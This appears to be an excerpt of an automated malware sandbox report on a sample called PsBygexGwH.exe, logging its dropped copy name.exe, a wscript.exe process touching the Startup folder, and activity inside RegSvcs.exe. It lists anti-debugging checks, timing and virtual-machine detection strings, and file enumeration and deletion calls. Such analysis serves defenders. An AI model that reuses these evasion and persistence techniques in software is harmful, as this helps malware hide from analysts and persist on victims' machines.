Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597262	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595951	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594830	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1835	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8620	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1231	Jump to behavior

Source: C:\Users\user\Desktop\PsBygexGwH.exe	API coverage: 4.0 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.2 %

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0018DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0018DBBE
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001968EE FindFirstFileW,FindClose,	0_2_001968EE
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0019698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0019698F
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0018D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0018D076
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0018D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0018D3A9
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00199642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00199642
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0019979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0019979D
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00199B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00199B2B
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00195C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00195C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0032DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	6_2_0032DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_003368EE FindFirstFileW,FindClose,	6_2_003368EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0033698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	6_2_0033698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0032D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_0032D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0032D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_0032D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00339642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00339642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0033979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0033979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00339B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	6_2_00339B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00335C97 FindFirstFileW,FindNextFileW,FindClose,	6_2_00335C97

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_001242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001242DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599721	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594279	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594158	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597262	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595951	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594830	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: RegSvcs.exe, 0000000A.00000002.4088550668.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll81
Source: PsBygexGwH.exe, 00000000.00000003.1624604950.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, PsBygexGwH.exe, 00000000.00000002.2976091390.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2976079470.000000000176E000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000009.00000003.3106831071.0000000001C5D000.00000004.00000020.00020000.00000000.sdmp, troopwise.0.dr	Binary or memory string: GL9=6HGFS
Source: wscript.exe, 00000008.00000002.3105555476.0000012C6D816000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegSvcs.exe, 00000007.00000002.4087601813.00000000007EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 6_2_002CD010 Start: 002CD039 End: 002CD029

6_2_002CD010

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 6_2_002CD010 rdtsc

6_2_002CD010

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_04F77BA8 LdrInitializeThunk,

7_2_04F77BA8

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_0019EAA2 BlockInput,

0_2_0019EAA2

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_00152622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00152622

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_001242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001242DE

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00144CE8 mov eax, dword ptr fs:[00000030h]	0_2_00144CE8
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_023C3650 mov eax, dword ptr fs:[00000030h]	0_2_023C3650
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_023C36B0 mov eax, dword ptr fs:[00000030h]	0_2_023C36B0
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_023C1ED0 mov eax, dword ptr fs:[00000030h]	0_2_023C1ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E4CE8 mov eax, dword ptr fs:[00000030h]	6_2_002E4CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_039036B0 mov eax, dword ptr fs:[00000030h]	6_2_039036B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_03903650 mov eax, dword ptr fs:[00000030h]	6_2_03903650
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_03901ED0 mov eax, dword ptr fs:[00000030h]	6_2_03901ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 9_2_03D43650 mov eax, dword ptr fs:[00000030h]	9_2_03D43650
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 9_2_03D41ED0 mov eax, dword ptr fs:[00000030h]	9_2_03D41ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 9_2_03D436B0 mov eax, dword ptr fs:[00000030h]	9_2_03D436B0

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_00180B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00180B62

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00152622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00152622
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0014083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0014083F
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001409D5 SetUnhandledExceptionFilter,	0_2_001409D5
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00140C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00140C21
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_002F2622
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_002E083F
